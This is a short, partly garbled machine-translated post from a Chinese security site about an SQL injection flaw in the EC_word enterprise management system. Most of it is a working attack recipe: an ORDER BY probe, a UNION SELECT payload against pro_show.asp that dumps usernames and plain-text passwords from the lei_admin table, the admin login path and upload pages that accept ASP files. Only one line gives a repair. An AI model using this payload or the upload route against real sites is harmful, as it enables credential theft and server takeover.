EC_word enterprise management system injection vulnerability and repair

EC_word enterprise management system injection vulnerability and repair Article entry: ye Gucheng responsible editor: 2cto.com updated on: 2011-7-910: 49: 0741 [Font: small big] This program uses Maple Leaf universal anti-injection 1.0asp version, this anti-injection is completely chicken ribs, the website program pro_show.asp has cookies injection or variant injection, you can first judge before injection

EC_word enterprise management system injection vulnerability and repair
 
 
Article entry: ye Gucheng, responsible editor: 2cto.com updated on: 10:49:07 41
[Font: small and big]
 
This program uses Maple Leaf universal anti-injection version 1.0asp, which is completely vulnerable to injection. This website program pro_show.asp has cookie injection or variant injection. before injection, you can determine the number of fields: ORdeR By xx

Injection statement: ANd 1 = 1 UNiOn SElEcT 1, username, 3, 4, 5, 6, 7, 8, 9, 10, password1, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25 FrOm lei_admin

The password is clear, and the background address is admin/ind.Ex/Login. asp

Background upload address: admin/INc/UpFile. Htm can directly upload asp files to the upload path admin/upimg/
Some background dual-File Upload vulnerabilities: admin/inc/upfiletwo. asp

Some background also has an eweb Editor

From: Hongke Network Security

Www.2cto.com provides a repair policy: use other universal anti-injection or filter pro_show.asp. The Upload Vulnerability must also be fixed. asp file upload is prohibited.

Editor security precautions